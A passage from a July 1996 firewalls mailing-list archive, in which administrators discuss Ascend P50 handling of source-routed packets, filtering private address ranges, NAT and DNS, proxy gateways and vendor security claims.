of what I've found. Any residual misstatements, confusions and so on are my fault. * * * Source-routed packets and the Ascend P50 ---------------------------------------- At this time, all Ascend routers drop all packets with Strict Source Routing enabled. The routers, including the Pipeline 50, detect the presence of this option in their IP-recognition layer, before handing off the packet in question to the filtering rules. Any packet with strict source routing turned on is dropped before any rule has a chance to look at it. Hence, any static rule aimed at identifying strict-source-routed packets is unnecessary. Several people informed me that this was the case for the P50. More specifically, several people said the P50 dropped "source routed" packets by default. However, no one distinguished between strict source routing and loose source routing. Quite frankly, I still don't know what happens to packets having the Loose Source Routing option turned on. There is no mention of source routing at all in any of my P50 documentation. As I mentioned in my originally posted query, my calls to Ascend's formal tech support staff weren't all that enlightening. Out-of-band conversations with helpful Ascend guys worked a lot better. Regrettably, though, authoritative documentation on this subject is hard to come by, even within Ascend. The short version is that P50 owners may or may not be protected automatically from attacks based on Loose Source Routing. I just don't know. Those of you who today believe in your site's safety, based partly on your presumed immunity from such attacks, might want to run a few tests and pester Ascend to document this behavior is some credible and accessible manner. To be fair, Ascend's design choice -- kill before filtering -- is a reasonable one. By definition, Ascend's static filtering rules are ill equipped to deal sensibly with variable-length option data. Source-routing options can, in practice, show up at differing offsets in the packets, whereas an Ascend-style "generic" filter can look only at fixed locations. Hence, static filters are, in the P50, a bad choice for screening source-routed packets. With "generic" filters, you might catch some naively constructed packets of interest, but there are no guarantees. In order to deal correctly with all option-placement possibilities, you must have a packet handler that understands the underlying IP layout, which generic filters plainly do not. That's the bad news. The good news is that Ascend has recognized the need for this capability. Ascend Communications has unveiled an add-on security utility for some of their routers, including the Pipeline family, to be called Ascend Secure Access. Secure Access is supposed to be smart about IP options and should, at least in this instance, give me what I was looking for in the first place. (It also does a lot more, including dynamic reconfiguration of filtering, that looks handy. This is not an advertisement. I don't own Ascend stock. I'm just a P50 owner, telling you what I found when I went looking.) Those of you who tend to lie awake at night, worrying about your P50's filtering rules, might want to have a look at this enhancement. I have no idea what Ascend is going to charge for it. If any of you come up with a dollar figure, please post it back to this list or drop me a note. Again, this is not an ad for Ascend, but, in the interests of convenience, here are the relevant contact points, for those of you who are interested: info@ascend.com http://www.ascend.com Tel: +1 (510) 769-6001 Fax: +1 (510) 814-2300 Fax server: +1 (415) 688-4343 Special thanks to Messrs. Brennen, Edguer, Henits and Wong. If anything I've said here is wrong, please let me know -- I'll correct my errors in the mailing list. A lot of P50 owners are apparently relying on hearsay for ruleset construction (and lack thereof). This is definitely a case of ignorance not being bliss. Regards, Frank McCormick From firewalls-owner Fri Jul 5 00:52:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA16914 for firewalls-outgoing; Fri, 5 Jul 1996 00:33:25 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id AAA16873 for ; Fri, 5 Jul 1996 00:33:13 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id AAA13567 for ; Fri, 5 Jul 1996 00:30:36 -0700 Date: Fri, 5 Jul 1996 00:30:35 -0700 (PDT) From: Robert Hanson To: firewalls@greatcircle.com Subject: special case ips Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk does anyone have compact filters for livingston equipment for 127.0.0.0 - 127.255.255.255 10.0.0.0 - 10.255.255.255 172.16.0.0 - 172.16.255.255 and 192.168.0.0 - 192.168.255.255 addresses... apparently these addresses need to be filtered inbound on the gateway... any pointers to faqs or what have you would be greatly appreciated... ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com From firewalls-owner Fri Jul 5 01:24:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA19830 for firewalls-outgoing; Fri, 5 Jul 1996 01:18:18 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA19777 for ; Fri, 5 Jul 1996 01:18:03 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id KAA04781; Fri, 5 Jul 1996 10:10:41 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DCCE0D.70FC@apogee-com.fr> Date: Fri, 05 Jul 1996 10:10:53 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Colin Campbell Cc: Firewalls@GreatCircle.COM Subject: Re: Integrating Reuters Service thru TIS Toolkit References: <199607032215.IAA05993@guru.citec.qld.gov.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Colin Campbell wrote: > I believe they can only do this by supporting transparent proxies and > that requires kernel hacks which is why Gauntlet (on BSDI only?) supports > it and the toolkit doesn't. It is in essence nothing more than a router > filter, restricting access to certain addresses (1.2.3.*). > > Colin You're quite right. The many-to-many feature is only possible for outgoing access with the Gauntlet using the transparency feature. The transparency is available on all platforms, not only BSD/OS. I won't use the comparison with a router filter since the Gauntlet is a real Application Gateway opening only one client port for a connection (whereas a router filter would allow all >1024 port #). But you're right to use this comparison to explain the functionnality. Regards, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Fri Jul 5 01:49:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA22000 for firewalls-outgoing; Fri, 5 Jul 1996 01:33:20 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA21980 for ; Fri, 5 Jul 1996 01:33:03 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id KAA04911; Fri, 5 Jul 1996 10:26:11 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DCD1BA.7A12@apogee-com.fr> Date: Fri, 05 Jul 1996 10:26:34 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Robert Hanson Cc: firewalls@greatcircle.com Subject: Re: special case ips References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, You should read the RFC1918 dealing with those kind of network addresses. -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Fri Jul 5 02:04:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA24282 for firewalls-outgoing; Fri, 5 Jul 1996 01:55:46 -0700 (PDT) Received: from gmap-gw.gmap.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA24273 for ; Fri, 5 Jul 1996 01:55:35 -0700 (PDT) Received: (from root@localhost) by gmap-gw.gmap.leeds.ac.uk (8.7.3/8.6.9) id IAA16919 for ; Fri, 5 Jul 1996 08:57:38 +0100 (BST) Received: from gmap3.gmap.leeds.ac.uk(129.11.200.3) by gmap-gw via smap (V1.3) Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA13342 for ; Fri, 5 Jul 1996 09:53:37 +0100 From: Danny Cox Date: Fri, 5 Jul 1996 09:52:45 +0100 Message-Id: <19874.9607050852@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #406 X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt >From: "D.A. Meyer" > >I'm looking for a tool which shows me the PID of the process which is > >responsible for the offering of a TCP/UDP-port. I think i've seen > >something here on the list but i do not remember the name. > > You're looking for "lsof". It's available at > http://wuarchive.wustl.edu/packages/security/lsof/ among other places. Hmm .. something I'd *very* much like is an extension to 'ps' to inform me which machines a connection came from, so that I could know - for example - which machine is using a given proxy etc .. anyone any ideas? I suppose I could just about cope with writing one, but there must be something out there.. cheeers, Danny From firewalls-owner Fri Jul 5 03:04:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA29234 for firewalls-outgoing; Fri, 5 Jul 1996 02:47:14 -0700 (PDT) Received: from relay4.oleane.net (Relay4.OLEANE.NET [194.2.1.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id CAA29225 for ; Fri, 5 Jul 1996 02:47:01 -0700 (PDT) Received: from dyn-6.vin.oleane.com (dyn-6.vin.oleane.com [194.2.6.6]) by relay4.oleane.net (8.7.5/8.7.3) with SMTP id LAA15239 for ; Fri, 5 Jul 1996 11:43:21 +0200 (MET DST) Message-Id: <199607050943.LAA15239@relay4.oleane.net> X-Sender: fm004@pop.dial.oleane.com (Unverified) X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 05 Jul 1996 11:42:14 +0200 To: Firewalls@GreatCircle.COM From: Francois Mauchamp Subject: Re: Integrating Reuters Service thru TIS Toolkit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:10 05/07/1996 +0200, you wrote: >Colin Campbell wrote: > >> I believe they can only do this by supporting transparent proxies and >> that requires kernel hacks which is why Gauntlet (on BSDI only?) supports >> it and the toolkit doesn't. It is in essence nothing more than a router >> filter, restricting access to certain addresses (1.2.3.*). >> >> Colin > >You're quite right. The many-to-many feature is only possible for >outgoing access with the Gauntlet using the transparency feature. >The transparency is available on all platforms, not only BSD/OS. > >I won't use the comparison with a router filter since the Gauntlet >is a real Application Gateway Right but ... > opening only one client port for >a connection (whereas a router filter would allow all >1024 port #). ...IMHO, this is not the reason (but others) why we can say Gauntlet is an Application Gateway. Has it something to do with semantic analysis of protcols that are proxied ? :-) >But you're right to use this comparison to explain the functionnality. > >Regards, > >Jean-Francois > Best regards, Francois. From firewalls-owner Fri Jul 5 04:19:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA02776 for firewalls-outgoing; Fri, 5 Jul 1996 04:11:40 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA02768 for ; Fri, 5 Jul 1996 04:11:26 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id NAA06407; Fri, 5 Jul 1996 13:04:40 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DCF6F5.3984@apogee-com.fr> Date: Fri, 05 Jul 1996 13:05:25 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Francois Mauchamp Cc: Firewalls@GreatCircle.COM Subject: Re: Integrating Reuters Service thru TIS Toolkit References: <199607050943.LAA15239@relay4.oleane.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Francois Mauchamp wrote: > > > Right but ... > > > opening only one client port for > >a connection (whereas a router filter would allow all >1024 port #). > > ...IMHO, this is not the reason (but others) why we can say Gauntlet is an > Application Gateway. > Has it something to do with semantic analysis of protcols that are proxied ? :-) > >yup :^) But plug-gw does not analyse the protocol it relays ! It just take packets from one socket and put them in the other socket. Quite frankly, I just wanted to point out one aspect...I did not want to write a paper on the whole stuff :) Regards -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Fri Jul 5 06:34:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA08426 for firewalls-outgoing; Fri, 5 Jul 1996 06:31:24 -0700 (PDT) Received: from ACML.COM ([206.218.249.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA08400 for ; Fri, 5 Jul 1996 06:31:16 -0700 (PDT) Received: from smtpngw.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) Received: by smtpngw.acml.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA1236; Fri, 05 Jul 96 09:28:55 -0400 Message-Id: <9607051328.AA1236@smtpngw.acml.com> Received: from ACML with "Lotus Notes Mail Gateway for SMTP" id To: Firewalls-Digest Cc: firewalls-digest From: Rey.LeClerc/New.York/ACMC Date: 5 Jul 96 9:24:06 Subject: Re: Firewalls-Digest V5 #404 X-Lotus-Type: Reply to _All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am doing some research regarding SWIFT. Are there any security issues regarding this product? Thanks in advance for your input. From firewalls-owner Fri Jul 5 07:04:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA09705 for firewalls-outgoing; Fri, 5 Jul 1996 07:00:30 -0700 (PDT) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA09696 for ; Fri, 5 Jul 1996 07:00:20 -0700 (PDT) Received: from netevolve.com by relay1.UU.NET with SMTP Received: from lazar by netevolve.com (4.1/SMI-4.1) Message-Id: <9607051400.AA04977@netevolve.com> Comments: Authenticated sender is From: "Irwin Lazar" Organization: Network Evolutions To: firewalls@greatcircle.com Date: Fri, 5 Jul 1996 09:58:09 +0000 Subject: Cisco IP Filters Reply-To: lazar@netevolve.com X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone please point me to some good references on the web relating to implementing IP Access Lists on Cisco routers. Thanks. Irwin M. Lazar Network Evolutions, Inc. lazar@netevolve.com http://www.netevolve.com From firewalls-owner Fri Jul 5 07:19:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA09956 for firewalls-outgoing; Fri, 5 Jul 1996 07:03:46 -0700 (PDT) Received: from relay1.oleane.net (NS.OLEANE.NET [194.2.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA09920 for ; Fri, 5 Jul 1996 07:03:18 -0700 (PDT) Received: from bo-corp (bo-corp.businessobjects.com [194.2.72.3]) by relay1.oleane.net (8.6.10/8.6.9) with SMTP id QAA25247 for ; Fri, 5 Jul 1996 16:00:24 +0200 Received: from gtw-smtp.businessobjects.com by bo-corp (5.x/SMI-SVR4) Received: from cc:Mail by gtw-smtp.businessobjects.com Date: Fri, 05 Jul 96 16:04:22 WET From: "Eddy JAFFRENNOU" Message-Id: <9606058366.AA836607904@gtw-smtp.businessobjects.com> To: firewalls@GreatCircle.com Subject: NAT and DNS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just a little question. Is it necessary, with the NAT technology, to duplicate the DNS serveur? Thanks all. Eddy JAFFRENNOU From firewalls-owner Fri Jul 5 08:04:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA14273 for firewalls-outgoing; Fri, 5 Jul 1996 07:52:58 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA14255 for ; Fri, 5 Jul 1996 07:52:50 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id JAA16496; Fri, 5 Jul 1996 09:50:06 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA29762; Fri, 5 Jul 1996 09:43:07 -0500 Received: by sonic.nmti.com; id AA16714; Fri, 5 Jul 1996 09:43:06 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607051443.AA16714@sonic.nmti.com.nmti.com> Subject: Re: NetworkMCI Webmaker To: Russ.Cooper@RC.Toronto.on.ca (Russ) Date: Fri, 5 Jul 1996 09:43:06 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <01BB691B.1D403040@rwcooper.rc.toronto.on.ca> from "Russ" at Jul 3, 96 08:06:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Re: http://www.webmaker.mci.com/webmaker/features/secbrf.htm Well well well: > Netscape server - this user account only allows the Netscape Communication > Server process to log into NT as a service. Logging in as a service allows > the networkMCI WebMaker to control all accesses of the process. Since no > external log in is permitted for this service, password guessing is not an > option. Netscape permissions narrows the total resources available to > Netscape to those in the Netscape directory on the C:\ drive. Haven't there been a couple of reports about major CGI holes in the Netscape server? Doesn't that make the lack of password guessing a moot point? All you need to do is get one DLL in there and you can proxy anything you want though to the internal net... and they've helpfully told us port 443 is available for that purpose. > 443 - TCP Secure Http (not supported in networkMCI WebMaker 1.0) And they end with: > While achieving 100% security is not practical, it is important to > match desired access security with the value of the resources being > protected. networkMCI WebMaker's firewall security system meets, or > exceeds the security requirements of most small to medium sized > businesses. Anyone remember the parable of the widow's mite? From firewalls-owner Fri Jul 5 09:34:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA19068 for firewalls-outgoing; Fri, 5 Jul 1996 09:26:42 -0700 (PDT) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA19045 for ; Fri, 5 Jul 1996 09:26:34 -0700 (PDT) Received: from rachel.predictive.com (shema.planet.net [198.69.1.42]) by cohiba.predictive.com (8.6.11/8.6.12) with SMTP id LAA09551 for ; Fri, 5 Jul 1996 11:37:37 -0400 Message-ID: <31DD1AE3.6AD4@pobox.com> Date: Fri, 05 Jul 1996 09:38:43 -0400 From: Rachel Rosencrantz Reply-To: rachelr@pobox.com Organization: Predictive Systems X-Mailer: Mozilla 3.0b4 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Active X and plugins (And the MSN Explorer) References: <199607040036.RAA15304@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I haven't really been reading up on the MSN Explorer but just the other day I overheard someone say that the latest downloads plug-ins and installs them automatically. Is there a way to disable this or is this a permanent feature of the browser? Is this the default setting? I know that users can and do download plug-ins and install them, but unless there is something in the MSN security model that I'm unaware of, it seems like this would be a great way to stick some really unpleasant code on a lot of random machines without people necessarily knowing they've done it. (Check out this cool page with -put the most popular words here- and see the latest blah... Put something on the page that requires your plugin, and voilah instant mods on their browser. ) What kind of security does the MS Explorer browser have to prevent vicious plug-ins. -Rachel From firewalls-owner Fri Jul 5 09:53:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA19789 for firewalls-outgoing; Fri, 5 Jul 1996 09:43:42 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA19771 for ; Fri, 5 Jul 1996 09:43:33 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id SAA15979; Fri, 5 Jul 1996 18:41:20 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607051639.AA15570@tidtest.total.fr> To: lazar@netevolve.com Cc: firewalls@greatcircle.com Subject: Re: Cisco IP Filters In-Reply-To: Your message of "Fri, 05 Jul 1996 09:58:09 -0000." X-Cuse: "The dog ate my network" Date: Fri, 05 Jul 1996 18:39:46 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <9607051400.AA04977@netevolve.com>, "Irwin Lazar" writes: > Could someone please point me to some good references on the web > relating to implementing IP Access Lists on Cisco routers. > http://www.cisco.com/, "Technical tips" (under the heading "Technical assistance". Not sure whether you can access it without a maintenance contract. If you can't, try cisco@spot.colorado.edu, but chances are they will point you to their web server :-( Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Fri Jul 5 10:19:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA21275 for firewalls-outgoing; Fri, 5 Jul 1996 10:04:31 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA21232 for ; Fri, 5 Jul 1996 10:04:20 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id TAA16129; Fri, 5 Jul 1996 19:02:20 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607051700.AA15795@tidtest.total.fr> To: "Eddy JAFFRENNOU" Cc: firewalls@greatcircle.com Subject: Re: NAT and DNS In-Reply-To: Your message of "Fri, 05 Jul 1996 16:04:22 +0700." X-Cuse: "The dog ate my network" Date: Fri, 05 Jul 1996 19:00:51 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <9606058366.AA836607904@gtw-smtp.businessobjects.com>, "Eddy JAFFREN NOU" writes: > Just a little question. > > Is it necessary, with the NAT technology, to duplicate the DNS > serveur? > Not quite sure what you have in mind, but I'll answer anyway :-) Your clients behind the NAT box don't need a split DNS, they should work the same wrt DNS with or without a NAT box. The machines, if any, sitting between the NAT box and the Internet (eg, WEB server accessible from outside) don't need it either, provided the NAT box can be configured to pass untouched the address of your DNS server(s) (assuming they're behind the NAT box). The only reason I can think of why you would need a split DNS is when accessing outside servers that do an address-to-name check a la wu-ftpd, in which case you would need a NAT-aware DNS server, presumably part of the NAT box itself, but even then, I don't think you would need another DNS server on top of that, except maybe for performance reasons. HTH Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Fri Jul 5 10:49:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA25467 for firewalls-outgoing; Fri, 5 Jul 1996 10:46:22 -0700 (PDT) Received: from internet (internet.dswnet.com [206.214.66.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA25439 for ; Fri, 5 Jul 1996 10:46:12 -0700 (PDT) Received: from ntraptor (boni) by internet (5.x/SMI-SVR4) Message-Id: <31DD544C.47BB@dswnet.com> Date: Fri, 05 Jul 1996 10:43:40 -0700 From: Boni Bruno - Director of Internet Services & Security Organization: Data Systems West X-Mailer: Mozilla 3.0B2 (WinNT; I) Mime-Version: 1.0 To: Firewalls@GreatCircle.COM Cc: mbai@straticom.com Subject: Re: Firewalls-Digest V5 #393 References: <199606271821.LAA25335@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Thu, 27 Jun 1996 09:06:16 -0400 > From: Mario Bai > Subject: Re: IP address for Enterprises use > > >Robert Bonomi wrote: > > + Dear All, > > + > > + Who can tell me where I can find the RFC document about Enterprises IP address. > > + > > + In order to avoid conflicting with Internet IP address. Our Company will use some IP address matching RFC definition. > > + > > + If anybody know the solution, please let me know where I can get such document. > > + > > > > use the class A address 10.0.0.0 netmask 255.0.0.0 this is safe. > > What is the potential problems introduced when using "bogus" or reserved > IP address behind a firewall/proxy server? I know that the proxy server > should translate all internal IP addresses and only present its own IP > address to the Internet (or receiving server), but if you have > implemented solely an HTTP proxy server and sophisticated IP filtering > on a Cisco router, what are the potential problems that could arise? Are > there any circumstances where the internal IP address would "leak" out > onto the Internet and cause problems? > > tia, You can find RFC 1918 at http://andrew2.andrew.cmu.edu/rfc/rfc1918.html, which obsoletes RFC 1627, 1597 on address allocation for private internets. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Boni D. Bruno, Director of Internet Services - x225 818-883-9800 (FAX)883-4604 Data Systems West 21101 Oxnard Street bbruno@dswnet.com Woodland Hills, CA 91367 http://www.dswnet.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Fri Jul 5 12:34:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA01144 for firewalls-outgoing; Fri, 5 Jul 1996 12:26:51 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA01135 for ; Fri, 5 Jul 1996 12:26:45 -0700 (PDT) Received: by hidata.com; id AA26901; Fri, 5 Jul 96 12:24:09 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Fri, 5 Jul 1996 12:23:44 -0700 Message-Id: <199607051923.MAA08347@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Secure Virtual Intranets Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are the most widely used methods to create Secure HTTP/FTP Intranets over the Internet? I can think of just a few off the top of my head: 1. Encryted PC-Firewall links. a. Webserver must be inside firewall, guests must also pass through firewall. b. You must pay for/install/support encryption software. c. Complete (IP) protocol stack encryption/access. 2. Certificates on browser and server. a. Webserver can be outside firewall. b. No (additional) cost/support for client software c. Security is based on physical browser, not user. b. Certificates must be requested from Verisign/RSA, or private certificates created via Xcert software (http://www.xcert.com/). 3. HTTPS. a. Webserver can be outside firewall. b. No (additional) cost/support for client software b. Intranet Username/Password authentication managed separately from network authentication. c. Multiple Intranet servers also managed separately. Bill Stout <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... -------------------------------------------------------------------------------- From firewalls-owner Fri Jul 5 13:04:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA02289 for firewalls-outgoing; Fri, 5 Jul 1996 12:51:30 -0700 (PDT) Received: from dartvax.dartmouth.edu (dartvax.dartmouth.edu [129.170.16.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA02276 for ; Fri, 5 Jul 1996 12:51:21 -0700 (PDT) Received: from hanover.VALLEY.NET (hanover.valley.net [198.115.160.10]) by dartvax.dartmouth.edu (8.7.5.1+DND/8.7.3) with SMTP id PAA09900 for ; Fri, 5 Jul 1996 15:48:40 -0400 (EDT) Received: by hanover.VALLEY.NET (blitz.valley.net) via SMTP from v2-p-110.valley.net id <1276703> 05 Jul 96 15:48:37 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 5 Jul 1996 15:54:47 -0500 To: Firewalls@GreatCircle.COM From: randy.witlicki@valley.net (Randy Witlicki) Subject: RE: OS/2 firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Check out Netguard at: > > http://www.netguard.com > > FW for both NT and OS/2 platforms. Yikes ! I just looked at their web page and the slogan there is: "The Foolproof Internet Firewall System" Take a deep breath and chant after me: Computer Security is not Software. Computer Security is not Hardware. Computer Security is Wetware. ObStory: I just finished up a System Admin contract and the management there asked "Before you leave, could you do a write-up of all the things you do, in case something goes wrong." - Randy randy.witlicki@valley.net From firewalls-owner Fri Jul 5 13:34:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA04630 for firewalls-outgoing; Fri, 5 Jul 1996 13:20:56 -0700 (PDT) Received: from tigre.dc.ufscar.br ([200.9.84.141]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA04539 for ; 